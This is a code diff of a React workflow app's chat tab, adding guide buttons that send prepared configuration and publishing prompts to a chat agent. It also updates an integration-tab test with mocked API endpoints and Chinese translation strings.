+    (prompt: string, label: string) => {
+      void handleCreateAndSend(prompt, [], undefined, undefined, {
+        displayText: buildInstructionDisplayText(label),
+      });
+    },
+    [handleCreateAndSend],
   );
 
   const handleNewSession = useCallback(() => {
@@ -191,8 +319,9 @@ export default function ChatTab({
     try {
       const res = await workflowAPI.get(workflowIdRef.current);
       const fresh = res.data;
-      if (fresh.updatedAt > lastUpdatedAtRef.current) {
-        lastUpdatedAtRef.current = fresh.updatedAt;
+      const nextRevision = workflowRevisionKey(fresh);
+      if (nextRevision !== workflowRevisionRef.current) {
+        workflowRevisionRef.current = nextRevision;
         onWorkflowUpdated(fresh);
       }
     } catch { /* ignore */ }
@@ -207,12 +336,14 @@ export default function ChatTab({
   const handleSSEEvent = useCallback(
     (event: SSEChatEvent) => {
       const { type, properties } = event;
+      const toolPart = (
+        type === 'message.part.updated' && properties?.part?.type === 'tool'
+      ) ? properties.part : null;
       if (
-        type === 'message.part.updated'
-        && properties?.part?.type === 'tool'
-        && properties.part.tool === 'run_workflow'
+        toolPart
+        && toolPart.tool === 'run_workflow'
       ) {
-        const state = properties.part.state as Record<string, any> | undefined;
+        const state = toolPart.state as Record<string, any> | undefined;
         const metadata = (state?.metadata ?? {}) as Record<string, any>;
         const workflowId = metadata.workflow_id;
         if (
@@ -236,9 +367,17 @@ export default function ChatTab({
             currentNodeType: metadata.current_node_type,
             currentPhase: metadata.phase,
             currentStepIndex: metadata.step_index,
+            stepCount: metadata.step_count,
+            loopProgress: metadata.loop_progress,
           });
         }
       }
+      if (toolPart) {
+        const state = toolPart.state as Record<string, any> | undefined;
+        if (state?.status === 'completed' || state?.status === 'error') {
+          void checkWorkflowUpdate();
+        }
+      }
       if (!onWorkflowUpdated) return;
       if (
         (type === 'workflow.updated' || type === 'workflow.created') &&
@@ -253,11 +392,10 @@ export default function ChatTab({
   // Fallback: low-frequency polling for filesystem-driven changes (Rex writes directly)
   useEffect(() => {
     if (!sessionId || !onWorkflowUpdated) return;
-    lastUpdatedAtRef.current = workflow.updatedAt;
 
     const timer = setInterval(checkWorkflowUpdate, FALLBACK_POLL_MS);
     return () => clearInterval(timer);
-  }, [sessionId, workflow.id, workflow.updatedAt, onWorkflowUpdated, checkWorkflowUpdate]);
+  }, [sessionId, workflow.id, onWorkflowUpdated, checkWorkflowUpdate]);
 
   const nodeRef: NodeRef | null = selectedNode
     ? { id: selectedNode.id, type: selectedNode.type, description: selectedNode.description }
@@ -329,14 +467,63 @@ export default function ChatTab({
           live={!!sessionId}
           placeholder={t('detail.chat.inputPlaceholder')}
           className="h-full"
+          display={{ collapseIntermediateSteps: true, processGroupsDefaultOpen: false }}
+          agentName={WORKFLOW_CHAT_AGENT_NAME}
+          mentionAgents={workflowChatAgents}
           nodeRef={nodeRef}
           onNodeRefDismiss={onNodeRefDismiss}
           onStreamingDone={handleStreamingDone}
           initialMessage={initialMessage}
           onSSEEvent={handleSSEEvent}
-          supportsVision={supportsVision}
+          supportsVision={effectiveSupportsVision}
+          contextWindowTokens={selectedModelOption?.contextWindowTokens ?? null}
+          model={selectedPromptModel}
           onCreateAndSend={!sessionId ? handleCreateAndSend : undefined}
-          welcomeContent={!sessionId ? <WorkflowWelcome workflow={workflow} error={error} onRetry={() => { hasCreatedRef.current = false; resetSession(); }} /> : undefined}
+          composerTextareaMinHeight={48}
+          composerTextareaMaxHeight={120}
+          toolbarSlot={
+            <ChatAgentDisplay
+              agents={workflowChatAgents}
+              selectedAgent={WORKFLOW_CHAT_AGENT_NAME}
+            />
+          }
+          centerToolbarSlot={
+            <ChatModelPicker
+              groupedOptions={groupedChatModelOptions}
+              loading={loadingChatModels}
+              selectedModelOption={selectedModelOption}
+              onSelectModel={(option) => setSelectedModelKey(option.key)}
+            />
+          }
+          conversationBottomSlot={({ sendPrompt, sending, streaming }) => (
+            <>
+              <WorkflowLaunchRequestRunner
+                launchRequest={launchRequest}
+                enabled={sessionsHydrated}
+                onLaunchRequestHandled={onLaunchRequestHandled}
+                onStartPrompt={(prompt, label) => sendPrompt(prompt, {
+                  displayText: label ? buildInstructionDisplayText(label) : undefined,
+                })}
+              />
+              {sessionId || sending || streaming ? (
+                <WorkflowGuideDock
+                  workflow={workflow}
+                  disabled={sending || streaming}
+                  onStartPrompt={(prompt, label) => sendPrompt(prompt, {
+                    displayText: buildInstructionDisplayText(label),
+                  })}
+                />
+              ) : null}
+            </>
+          )}
+          welcomeContent={!sessionId ? (
+            <WorkflowWelcome
+              workflow={workflow}
+              error={error}
+              onRetry={() => { hasCreatedRef.current = false; resetSession(); }}
+              onStartPrompt={handleWelcomeGuidePrompt}
+            />
+          ) : undefined}
         />
       </div>
     </div>
@@ -351,60 +538,58 @@ function WorkflowWelcome({
   workflow,
   error,
   onRetry,
+  onStartPrompt,
 }: {
   workflow: Workflow;
   error: string | null;
   onRetry: () => void;
+  onStartPrompt: (prompt: string, label: string) => void;
 }) {
-  const { t } = useTranslation('workflow');
-  const workflowDir = workflow.source === 'global'
-    ? `~/.flocks/plugins/workflows/${workflow.id}/`
-    : `.flocks/plugins/workflows/${workflow.id}/`;
+  const { t, i18n } = useTranslation('workflow');
+  const workflowDisplayName = getWorkflowDisplayName(workflow, i18n?.language);
+  const guideGroups = buildWorkflowGuideGroups(t, workflow);
 
   return (
-    <div className="w-full max-w-md space-y-4 text-left">
-      <div className="text-xs text-gray-700 space-y-2">
-        <p className="font-semibold text-gray-900">{t('detail.chat.welcome.title', { name: workflow.name })}</p>
-        <p className="text-gray-500 leading-relaxed">
-          {t('detail.chat.welcome.descPart1')}
-          <span className="font-medium text-gray-700">{t('detail.chat.welcome.mdTabLabel')}</span>
-          {t('detail.chat.welcome.descPart2')}
-        </p>
-      </div>
-
-      <div className="rounded-lg border border-gray-100 bg-gray-50 p-3 space-y-2">
-        <div className="flex items-center gap-1.5 text-[10px] font-medium text-gray-400 uppercase tracking-wide">
-          <FolderOpen className="w-3 h-3" />
-          {t('detail.chat.welcome.fileDir')}
-        </div>
-        <div className="font-mono text-[11px] text-gray-600 space-y-1">
-          <p className="text-gray-500">{workflowDir}</p>
-          <p className="pl-3">
-            ├── <span className="text-red-600">workflow.md</span>
-            {!workflow.markdownContent && (
-              <span className="text-gray-400 ml-1">{t('detail.chat.welcome.notGenerated')}</span>
-            )}
+    <div className="flex min-h-[420px] w-full flex-col items-center justify-center px-5 py-8">
+      <p className="mb-8 text-center text-sm font-medium text-gray-400">
+        {t('detail.run.noHistory')}
+      </p>
+      <div className="flex max-h-[min(560px,calc(100vh-260px))] w-full max-w-[420px] flex-col overflow-hidden rounded-xl border border-gray-200 bg-white px-5 py-5 text-center shadow-sm">
+        <div className="flex-shrink-0">
+          <div className="mx-auto flex h-11 w-11 items-center justify-center rounded-xl border border-red-100 bg-red-50 text-red-500">
+            <Bot className="h-5 w-5" />
+          </div>
+          <h3 className="mt-4 text-sm font-semibold text-gray-900">
+            {t('detail.chat.welcome.editPanelTitle')}
+          </h3>
+          <p className="mx-auto mt-2 max-w-[320px] text-xs leading-relaxed text-gray-500">
+            {t('detail.chat.welcome.editPanelDesc', { name: workflowDisplayName })}
           </p>
-          <p className="pl-3">└── <span className="text-amber-600">workflow.json</span></p>
         </div>
-      </div>
-
-      <div className="rounded-lg border border-red-100 bg-red-50 p-3 text-xs text-red-800 space-y-1.5 leading-relaxed">
-        <p className="font-medium">{t('detail.chat.welcome.canHelp')}</p>
-        <ul className="space-y-1 text-red-700">
-          <li>• {t('detail.chat.welcome.bullet1')}</li>
-          <li>• {t('detail.chat.welcome.bullet2')}</li>
-          <li>• {t('detail.chat.welcome.bullet3')}</li>
-          <li>• {t('detail.chat.welcome.bullet4')}</li>
-        </ul>
-        <p className="pt-1 text-red-600 border-t border-red-200">
-          {t('detail.chat.welcome.tipPart1')}<span className="font-medium">{t('detail.chat.welcome.mdTabLabel')}</span>
-          {t('detail.chat.welcome.tipPart2')}
-        </p>
+        <div
+          data-testid="workflow-edit-guide-scroll"
+          className="mt-4 min-h-0 space-y-4 overflow-y-auto pr-1 text-left [scrollbar-width:thin] [scrollbar-color:#e4e4e7_transparent]"
+        >
+          <WorkflowGuideSection
+            title={t('detail.chat.welcome.editSectionTitle')}
+            actions={guideGroups.editActions}
+            onStartPrompt={onStartPrompt}
+          />
+          <WorkflowGuideSection
+            title={t('detail.chat.welcome.configSectionTitle')}
+            actions={guideGroups.configActions}
+            onStartPrompt={onStartPrompt}
+          />
+          <WorkflowGuideSection
+            title={t('detail.chat.welcome.publishSectionTitle')}
+            actions={guideGroups.publishActions}
+            onStartPrompt={onStartPrompt}
+          />
+        </div>
       </div>
 
       {error && (
-        <div className="flex items-center gap-2 text-xs text-red-600 bg-red-50 border border-red-200 rounded-lg px-3 py-2">
+        <div className="mt-4 flex w-full max-w-[420px] items-center gap-2 rounded-lg border border-red-200 bg-red-50 px-3 py-2 text-xs text-red-600">
           <AlertCircle className="w-4 h-4 flex-shrink-0" />
           <span className="flex-1">{error}</span>
           <button onClick={onRetry} className="underline hover:no-underline flex-shrink-0">
@@ -415,3 +600,317 @@ function WorkflowWelcome({
     </div>
   );
 }
+
+// Renders one titled group of guide actions, or nothing when `actions` is empty.
+// Each row pairs a button, which hands the action's prompt and label to
+// `onStartPrompt`, with a GuideInfoIcon that receives the label and description.
+// Rows are keyed by label.
+function WorkflowGuideSection({
+  title,
+  actions,
+  onStartPrompt,
+}: {
+  title: string;
+  actions: ChatGuideAction[];
+  onStartPrompt: (prompt: string, label: string) => void;
+}) {
+  if (!actions.length) return null;
+
+  const rows = actions.map(({ label, prompt, description }) => (
+    <div
+      key={label}
+      className="group flex h-8 w-full items-center justify-between gap-3 rounded-lg border border-gray-200 bg-white px-3 text-left text-xs font-semibold text-gray-700 transition-colors hover:border-rose-200 hover:bg-rose-50/70 hover:text-rose-600"
+    >
+      <button
+        type="button"
+        onClick={() => onStartPrompt(prompt, label)}
+        className="min-w-0 flex-1 truncate text-left"
+      >
+        {label}
+      </button>
+      <GuideInfoIcon label={label} description={description} className="group-hover:text-rose-400" />
+    </div>
+  ));
+
+  return (
+    <section>
+      <h4 className="mb-2 text-[11px] font-semibold text-gray-400">{title}</h4>
+      <div className="flex flex-col gap-1.5">{rows}</div>
+    </section>
+  );
+}
+
+// Renders nothing; when enabled, forwards a launch request to onStartPrompt unless its id matches the last one handled.
+function WorkflowLaunchRequestRunner({
+  launchRequest,
+  enabled,
+  onLaunchRequestHandled,
+  onStartPrompt,
+}: {
+  launchRequest?: WorkflowChatLaunchRequest | null;
+  enabled: boolean;
+  onLaunchRequestHandled?: (id: number) => void;
+  onStartPrompt: (text: string, label?: string) => void;
+}) {
+  const lastHandledId = useRef<number | null>(null);
+  useEffect(() => {
+    const pending = enabled ? launchRequest : null;
+    if (!pending || lastHandledId.current === pending.id) return;
+    lastHandledId.current = pending.id;
+    onStartPrompt(pending.prompt, pending.displayLabel);
+    onLaunchRequestHandled?.(pending.id);
+  }, [enabled, launchRequest, onLaunchRequestHandled, onStartPrompt]);
+  return null;
+}
+
+// Gathers the interpolation values used by the guide prompts: the workflow's
+// id and name, its directory and file paths, and API endpoints with the
+// leading HTTP verb ("GET " / "POST ") removed.
+function buildWorkflowPromptParams(workflow: Workflow) {
+  const { id, name, source } = workflow;
+  const dir = source === 'global'
+    ? `~/.flocks/plugins/workflows/${id}/`
+    : `.flocks/plugins/workflows/${id}/`;
+  const { config, apiService, triggers } = workflowAPIEndpoints(id);
+  return {
+    id, name, dir,
+    mdPath: `${dir}workflow.md`,
+    guidePath: `${dir}${WORKFLOW_GUIDE_FILE_NAME}`,
+    configEndpoint: config.read.replace(/^GET /, ''),
+    configSyncEndpoint: config.syncFallback.replace(/^POST /, ''),
+    publishEndpoint: apiService.publish.replace(/^POST /, ''),
+    unpublishEndpoint: apiService.unpublish.replace(/^POST /, ''),
+    triggersEndpoint: triggers.list.replace(/^GET /, ''),
+    apiEndpoints: formatWorkflowAPIEndpoints(id),
+    configSkillName: WORKFLOW_CONFIG_SKILL_NAME,
+  };
+}
+
+/**
+ * Builds the prompt text for one focused guide question.
+ * Translates `detail.chat.welcome.guideQuestionPrompt` with the shared workflow
+ * params plus `focus` and `instruction`, then appends the
+ * `backendConfigAccessGuide` value, separated by a blank line.
+ */
+function buildWorkflowGuideQuestionPrompt(
+  t: TranslateFn,
+  workflow: Workflow,
+  focus: string,
+  instruction: string,
+): string {
+  const baseParams = buildWorkflowPromptParams(workflow);
+  const guidedParams = withBackendConfigAccessGuide(t, baseParams);
+  const questionParams = { ...guidedParams, focus, instruction };
+  const question = t('detail.chat.welcome.guideQuestionPrompt', questionParams);
+
+  return [question, guidedParams.backendConfigAccessGuide].join('\n\n');
+}
+
+// Builds the "edit" guide actions; every prompt is translated with the shared
+// workflow prompt params, and every action carries the edit section title as its group.
+function buildWorkflowEditActions(t: TranslateFn, workflow: Workflow): ChatGuideAction[] {
+  const promptParams = buildWorkflowPromptParams(workflow);
+  const group = t('detail.chat.welcome.editSectionTitle');
+  const toAction = (label: string, description: string, prompt: string): ChatGuideAction => (
+    { label, description, prompt, group }
+  );
+  return [
+    toAction(
+      t('detail.chat.welcome.editRequirementShort'),
+      t('detail.chat.welcome.editRequirementDesc'),
+      t('detail.chat.welcome.editRequirementPrompt', promptParams),
+    ),
+    toAction(
+      t('detail.chat.welcome.editNodeFunctionShort'),
+      t('detail.chat.welcome.editNodeFunctionDesc'),
+      t('detail.chat.welcome.editNodeFunctionPrompt', promptParams),
+    ),
+    toAction(
+      t('detail.chat.welcome.editNodeShort'),
+      t('detail.chat.welcome.editNodeDesc'),
+      t('detail.chat.welcome.editNodePrompt', promptParams),
+    ),
+    toAction(
+      t('detail.chat.welcome.editFlowShort'),
+      t('detail.chat.welcome.editFlowDesc'),
+      t('detail.chat.welcome.editFlowPrompt', promptParams),
+    ),
+    toAction(
+      t('detail.chat.welcome.editRegenerateShort'),
+      t('detail.chat.welcome.editRegenerateDesc'),
+      t('detail.chat.welcome.editRegeneratePrompt', promptParams),
+    ),
+  ];
+}
+
+/**
+ * Builds the "config" guide actions, all grouped under the config section title:
+ * the full guide prompt (with the backend config access guide appended), six
+ * focused guide questions, and finally the audit prompt.
+ */
+function buildWorkflowConfigActions(t: TranslateFn, workflow: Workflow): ChatGuideAction[] {
+  const promptParams = withBackendConfigAccessGuide(t, buildWorkflowPromptParams(workflow));
+  const group = t('detail.chat.welcome.configSectionTitle');
+  // Wraps one topic as an action whose prompt is the guide question built for it.
+  const questionAction = (
+    label: string,
+    description: string,
+    focus: string,
+    instruction: string,
+  ): ChatGuideAction => ({
+    label,
+    description,
+    prompt: buildWorkflowGuideQuestionPrompt(t, workflow, focus, instruction),
+    group,
+  });
+
+  return [
+    {
+      label: t('detail.chat.welcome.guidePrimaryShort'),
+      description: t('detail.chat.welcome.guidePrimaryDesc'),
+      prompt: [
+        t('detail.chat.welcome.guidePrompt', promptParams),
+        promptParams.backendConfigAccessGuide,
+      ].join('\n\n'),
+      group,
+    },
+    // Focused questions: the short label is translated a second time to serve as the focus.
+    questionAction(
+      t('detail.chat.welcome.guideInputModeShort'),
+      t('detail.chat.welcome.guideInputModeDesc'),
+      t('detail.chat.welcome.guideInputModeShort'),
+      t('detail.chat.welcome.guideInputModeInstruction'),
+    ),
+    questionAction(
+      t('detail.chat.welcome.guideSourceShapeShort'),
+      t('detail.chat.welcome.guideSourceShapeDesc'),
+      t('detail.chat.welcome.guideSourceShapeShort'),
+      t('detail.chat.welcome.guideSourceShapeInstruction'),
+    ),
+    questionAction(
+      t('detail.chat.welcome.guideOutputShort'),
+      t('detail.chat.welcome.guideOutputDesc'),
+      t('detail.chat.welcome.guideOutputShort'),
+      t('detail.chat.welcome.guideOutputInstruction'),
+    ),
+    questionAction(
+      t('detail.chat.welcome.guideFilterShort'),
+      t('detail.chat.welcome.guideFilterDesc'),
+      t('detail.chat.welcome.guideFilterShort'),
+      t('detail.chat.welcome.guideFilterInstruction'),
+    ),
+    questionAction(
+      t('detail.chat.welcome.guideSampleShort'),
+      t('detail.chat.welcome.guideSampleDesc'),
+      t('detail.chat.welcome.guideSampleShort'),
+      t('detail.chat.welcome.guideSampleInstruction'),
+    ),
+    questionAction(
+      t('detail.chat.welcome.guideApplyShort'),
+      t('detail.chat.welcome.guideApplyDesc'),
+      t('detail.chat.welcome.guideApplyShort'),
+      t('detail.chat.welcome.guideApplyInstruction'),
+    ),
+    // Audit uses its own prompt template with the same params.
+    {
+      label: t('detail.chat.welcome.guideAuditShort'),
+      description: t('detail.chat.welcome.guideAuditDesc'),
+      prompt: t('detail.chat.welcome.auditPrompt', promptParams),
+      group,
+    },
+  ];
+}
+
+/**
+ * Builds the "publish" guide actions (API, Syslog, Kafka, Webhook, schedule);
+ * each one's prompt is the guide question for that topic.
+ */
+function buildWorkflowPublishActions(t: TranslateFn, workflow: Workflow): ChatGuideAction[] {
+  const group = t('detail.chat.welcome.publishSectionTitle');
+  // Wraps one topic as an action whose prompt is the guide question built for it.
+  const questionAction = (
+    label: string,
+    description: string,
+    focus: string,
+    instruction: string,
+  ): ChatGuideAction => ({
+    label,
+    description,
+    prompt: buildWorkflowGuideQuestionPrompt(t, workflow, focus, instruction),
+    group,
+  });
+
+  return [
+    questionAction(
+      t('detail.run.guideApiShort'),
+      t('detail.run.guideApiDesc'),
+      t('detail.run.guideApiShort'),
+      t('detail.run.guideApiInstruction'),
+    ),
+    questionAction(
+      t('detail.run.guideSyslogShort'),
+      t('detail.run.guideSyslogDesc'),
+      t('detail.run.guideSyslogShort'),
+      t('detail.run.guideSyslogInstruction'),
+    ),
+    questionAction(
+      t('detail.run.guideKafkaShort'),
+      t('detail.run.guideKafkaDesc'),
+      t('detail.run.guideKafkaShort'),
+      t('detail.run.guideKafkaInstruction'),
+    ),
+    questionAction(
+      t('detail.run.guideWebhookShort'),
+      t('detail.run.guideWebhookDesc'),
+      t('detail.run.guideWebhookShort'),
+      t('detail.run.guideWebhookInstruction'),
+    ),
+    questionAction(
+      t('detail.run.guideScheduleShort'),
+      t('detail.run.guideScheduleDesc'),
+      t('detail.run.guideScheduleShort'),
+      t('detail.run.guideScheduleInstruction'),
+    ),
+  ];
+}
+
+// Builds the edit, config and publish action lists once, plus `allActions`:
+// the three lists concatenated in that order.
+function buildWorkflowGuideGroups(t: TranslateFn, workflow: Workflow) {
+  const groups = {
+    editActions: buildWorkflowEditActions(t, workflow),
+    configActions: buildWorkflowConfigActions(t, workflow),
+    publishActions: buildWorkflowPublishActions(t, workflow),
+  };
+  const allActions = groups.editActions.concat(groups.configActions, groups.publishActions);
+  return { ...groups, allActions };
+}
+
+// Feeds every workflow guide action (edit, config, publish) into ChatGuideDock,
+// passing `disabled` and `onStartPrompt` straight through.
+function WorkflowGuideDock({
+  workflow,
+  disabled,
+  onStartPrompt,
+}: {
+  workflow: Workflow;
+  disabled?: boolean;
+  onStartPrompt: (text: string, label: string) => void;
+}) {
+  const { t } = useTranslation('workflow');
+  const { allActions } = buildWorkflowGuideGroups(t, workflow);
+  const dockProps = {
+    actions: allActions,
+    disabled,
+    collapseTitle: t('detail.chat.welcome.guideCollapse'),
+    expandTitle: t('detail.chat.welcome.guideExpand'),
+    onStartPrompt,
+  };
+  return <ChatGuideDock {...dockProps} />;
+}
+
+// ─────────────────────────────────────────────
+// Helpers
+// ─────────────────────────────────────────────
diff --git a/webui/src/pages/WorkflowDetail/tabs/IntegrationTab.test.tsx b/webui/src/pages/WorkflowDetail/tabs/IntegrationTab.test.tsx
index 72390d8c8..31756100f 100644
--- a/webui/src/pages/WorkflowDetail/tabs/IntegrationTab.test.tsx
+++ b/webui/src/pages/WorkflowDetail/tabs/IntegrationTab.test.tsx
@@ -1,25 +1,74 @@
 import { describe, it, expect, vi, beforeEach } from 'vitest';
-import { fireEvent, render, screen, waitFor } from '@testing-library/react';
+import { render, screen, waitFor, within } from '@testing-library/react';
 import userEvent from '@testing-library/user-event';
 import IntegrationTab from './IntegrationTab';
 
-const { workflowAPI } = vi.hoisted(() => ({
+const { workflowAPI, workflowAPIEndpoints } = vi.hoisted(() => ({
   workflowAPI: {
     get: vi.fn(),
+    getConfig: vi.fn(),
+    updateConfig: vi.fn(),
     getService: vi.fn(),
+    deleteService: vi.fn(),
     publish: vi.fn(),
     unpublish: vi.fn(),
+    syncConfig: vi.fn(),
     getTriggers: vi.fn(),
     createTrigger: vi.fn(),
     updateTrigger: vi.fn(),
     deleteTrigger: vi.fn(),
     listTriggerPlugins: vi.fn(),
     runPollerOnce: vi.fn(),
+    saveSyslogConfig: vi.fn(),
+    getSyslogStatus: vi.fn(),
+    saveKafkaConfig: vi.fn(),
+    getKafkaStatus: vi.fn(),
+    savePollerConfig: vi.fn(),
+    getPollerStatus: vi.fn(),
+  },
+  workflowAPIEndpoints: (id: string, triggerId = '{triggerId}') => {
+    const workflowBase = `/api/workflow/${id}`;
+    const triggerBase = `${workflowBase}/triggers`;
+    const triggerRecord = `${triggerBase}/${triggerId}`;
+    return {
+      config: {
+        read: `GET ${workflowBase}/config`,
+        write: `PUT ${workflowBase}/config`,
+        syncFallback: `POST ${workflowBase}/config/sync`,
+      },
+      apiService: {
+        read: `GET ${workflowBase}/service`,
+        publish: `POST ${workflowBase}/publish`,
+        unpublish: `POST ${workflowBase}/unpublish`,
+        delete: `DELETE ${workflowBase}/service`,
+      },
+      triggers: {
+        list: `GET ${triggerBase}`,
+        create: `POST ${triggerBase}`,
+        update: `PUT ${triggerRecord}`,
+        delete: `DELETE ${triggerRecord}`,
+        status: `GET ${triggerRecord}/status`,
+        previewMapping: `POST ${triggerRecord}/preview-mapping`,
+        test: `POST ${triggerRecord}/test`,
+        invokeWebhook: `/webhook/workflows/${id}/${triggerId}`,
+        plugins: 'GET /api/workflow-trigger-plugins',
+      },
+      legacyAdapters: {
+        kafkaConfig: `GET/POST ${workflowBase}/kafka-config`,
+        kafkaStatus: `GET ${workflowBase}/kafka-status`,
+        pollerConfig: `GET/POST ${workflowBase}/poller-config`,
+        pollerStatus: `GET ${workflowBase}/poller-status`,
+        pollerRunOnce: `POST ${workflowBase}/poller-run-once`,
+        syslogConfig: `GET/POST ${workflowBase}/syslog-config`,
+        syslogStatus: `GET ${workflowBase}/syslog-status`,
+      },
+    };
   },
 }));
 
 vi.mock('@/api/workflow', () => ({
   workflowAPI,
+  workflowAPIEndpoints,
 }));
 
 vi.mock('@/components/common/CopyButton', () => ({
@@ -36,23 +85,58 @@ vi.mock('@/components/common/WorkflowStatusBadge', () => ({
 
 vi.mock('react-i18next', () => ({
   useTranslation: () => ({
-    t: (key: string) => {
+    t: (key: string, params?: Record<string, unknown>) => {
       const translations: Record<string, string> = {
         'detail.run.publishSection': '发布为 API',
         'detail.run.publishDesc': 'publish desc',
         'detail.run.publishAsApi': '发布为 API 服务',
+        'detail.run.triggerSection': '触发能力',
         'detail.run.publishFailed': '发布失败',
+        'detail.run.publishing': '发布中，请稍候...',
         'detail.run.stopFailed': '停止失败',
         'detail.run.stopping': '停止中...',
         'detail.run.stopService': '停止服务',
+        'detail.run.deleteService': '删除 API 发布配置',
+        'detail.run.deleteServiceShort': '删除配置',
+        'detail.run.deletingService': '删除中...',
+        'detail.run.deleteServiceConfirm': '确认删除 API 发布配置？',
+        'detail.run.deleteServiceFailed': '删除 API 发布配置失败',
         'detail.run.driverLocal': '本地进程',
         'detail.run.driverDocker': 'Docker 容器',
+        'detail.run.applyDriver': '应用运行方式',
         'detail.run.driverLocalDesc': 'local desc',
         'detail.run.driverDockerDesc': 'docker desc',
         'detail.run.apiKeyHide': '隐藏',
         'detail.run.apiKeyShow': '显示',
+        'detail.chat.backendConfigAccessGuide': '后端配置库认证方式：使用 server_api_token，并通过 Authorization: Bearer 访问 {{configEndpoint}}；兜底迁移接口是 {{configSyncEndpoint}}。',
+        'detail.run.guidePanelTitle': 'Rex 辅助发布',
+        'detail.run.guidePanelDesc': '选择一种发布方式',
+        'detail.run.cardGuideTitle': 'Flocks辅助配置',
+        'detail.run.cardGuideAction': '辅助配置',
+        'detail.run.cardGuideApiFocus': 'API 发布配置',
+        'detail.run.cardGuideApiDesc': '结合当前 API 服务状态、运行方式和工作流功能，引导确认发布、鉴权、调用样例和是否启动。',
+        'detail.run.cardGuideTriggerDesc': '结合当前 {{trigger}} 卡片配置和工作流功能，引导确认接入参数、字段映射、样例和生效方式。',
+        'detail.run.cardGuideDisplayLabel': 'Flocks辅助配置：{{focus}}',
+        'detail.run.guideApiShort': '发布为 API',
+        'detail.run.guideApiDesc': '配置 API 发布',
+        'detail.run.guideApiInstruction': '围绕 API 发布读取 guide.md，先 GET {{configEndpoint}}，确认后 PUT {{configEndpoint}}，config.json 和 workflow.json 不是直接写入目标；后端接口不可用时必须停止配置流程',
+        'detail.run.guideSyslogShort': 'Syslog 接入',
+        'detail.run.guideSyslogDesc': '配置 Syslog 接入',
+        'detail.run.guideSyslogInstruction': '围绕 Syslog 接入读取 guide.md，先 GET {{configEndpoint}}，确认后 PUT {{configEndpoint}}，config.json 和 workflow.json 不是直接写入目标；后端接口不可用时必须停止配置流程',
+        'detail.run.guideKafkaShort': 'Kafka 接入',
+        'detail.run.guideKafkaDesc': '配置 Kafka 接入',
+        'detail.run.guideKafkaInstruction': '围绕 Kafka 接入读取 guide.md，先 GET {{configEndpoint}}，确认后 PUT {{configEndpoint}}，config.json 和 workflow.json 不是直接写入目标；后端接口不可用时必须停止配置流程',
+        'detail.run.guideWebhookShort': 'Webhook 接入',
+        'detail.run.guideWebhookDesc': '配置 Webhook 接入',
+        'detail.run.guideWebhookInstruction': '围绕 Webhook 接入读取 guide.md，先 GET {{configEndpoint}}，确认后 PUT {{configEndpoint}}，config.json 和 workflow.json 不是直接写入目标；后端接口不可用时必须停止配置流程',
+        'detail.run.guideScheduleShort': '定时触发',
+        'detail.run.guideScheduleDesc': '配置定时触发',
+        'detail.run.guideScheduleInstruction': '围绕定时触发读取 guide.md，先 GET {{configEndpoint}}，确认后 PUT {{configEndpoint}}，config.json 和 workflow.json 不是直接写入目标；后端接口不可用时必须停止配置流程',
+        'detail.chat.welcome.guideQuestionPrompt': '用户点击了「{{focus}}」按钮。这个按钮的意图是：{{instruction}} 工作流 ID 是 {{id}}，工作流目录是 {{dir}}，工作流配置引导文件是 {{guidePath}}。配置模板接口是 {{configEndpoint}}。前端当前 API 清单：{{apiEndpoints}}。第一步必须读取 {{guidePath}}，必须调用 question 工具。',
       };
-      return translations[key] ?? key;
+      return (translations[key] ?? key).replace(/{{(\w+)}}/g, (_match, name: string) => (
+        params?.[name] === undefined ? '' : String(params[name])
+      ));
     },
   }),
 }));
@@ -83,20 +167,35 @@ const workflow = {
 };
 
 describe('IntegrationTab trigger workspace', () => {
-  const getFieldTextarea = (label: string): HTMLTextAreaElement => {
-    const field = screen.getByText(label).closest('div');
-    const textarea = field?.querySelector('textarea');
-    if (!(textarea instanceof HTMLTextAreaElement)) {
-      throw new Error(`textarea not found for field: ${label}`);
-    }
-    return textarea;
-  };
-
   beforeEach(() => {
     vi.clearAllMocks();
     vi.stubGlobal('confirm', vi.fn(() => true));
     workflowAPI.get.mockResolvedValue({ data: workflow });
+    workflowAPI.getConfig.mockResolvedValue({ data: { exists: false, path: '/tmp/config.json', config: {} } });
+    workflowAPI.updateConfig.mockImplementation(async (_id: string, config: unknown) => ({
+      data: {
+        ok: true,
+        exists: true,
+        path: '/tmp/config.json',
+        config,
+      },
+    }));
     workflowAPI.getService.mockResolvedValue({ data: null });
+    workflowAPI.deleteService.mockResolvedValue({ data: { ok: true, workflowId: 'wf-1' } });
+    workflowAPI.publish.mockResolvedValue({
+      data: {
+        workflowId: 'wf-1',
+        workflowName: 'Demo Workflow',
+        serviceUrl: 'http://127.0.0.1:8080',
+        invokeUrl: 'http://127.0.0.1:8080/invoke',
+        apiKey: 'secret',
+        status: 'running',
+        publishedAt: Date.now(),
+        driver: 'local',
+      },
+    });
+    workflowAPI.unpublish.mockResolvedValue({ data: { ok: true } });
+    workflowAPI.syncConfig.mockResolvedValue({ data: { ok: true, path: '/tmp/config.json', config: {} } });
     workflowAPI.getTriggers.mockResolvedValue({ data: [] });
     workflowAPI.createTrigger.mockResolvedValue({ data: { trigger: { id: 'hook-created' } } });
     workflowAPI.updateTrigger.mockImplementation(async (_workflowId: string, _triggerId: string, trigger: unknown) => ({
@@ -105,288 +204,473 @@ describe('IntegrationTab trigger workspace', () => {
     workflowAPI.deleteTrigger.mockResolvedValue({ data: { ok: true, triggerId: 'hook-1' } });
     workflowAPI.listTriggerPlugins.mockResolvedValue({ data: [] });
     workflowAPI.runPollerOnce.mockResolvedValue({ data: { ok: true, status: { state: 'running' } } });
+    workflowAPI.saveSyslogConfig.mockResolvedValue({ data: { ok: true, listener: { state: 'listening' } } });
+    workflowAPI.getSyslogStatus.mockResolvedValue({ data: { state: 'stopped' } });
+    workflowAPI.saveKafkaConfig.mockResolvedValue({ data: { ok: true, consumer: { state: 'running' } } });
+    workflowAPI.getKafkaStatus.mockResolvedValue({ data: { state: 'stopped' } });
+    workflowAPI.savePollerConfig.mockResolvedValue({ data: { ok: true, status: { state: 'running' } } });
+    workflowAPI.getPollerStatus.mockResolvedValue({ data: { state: 'stopped' } });
   });
 
-  it('renders publish section first and unified trigger workspace below', async () => {
-    render(<IntegrationTab workflow={workflow} />);
-
-    expect(await screen.findByText('发布为 API')).toBeInTheDocument();
-    expect(await screen.findByText('集成')).toBeInTheDocument();
+  it('renders guide with persistent API and trigger workspaces when no runtime records exist', async () => {
+    const onGuidePrompt = vi.fn();
+    render(<IntegrationTab workflow={workflow} onGuidePrompt={onGuidePrompt} />);
+
+    const apiCard = await screen.findByTestId('api-publish-card');
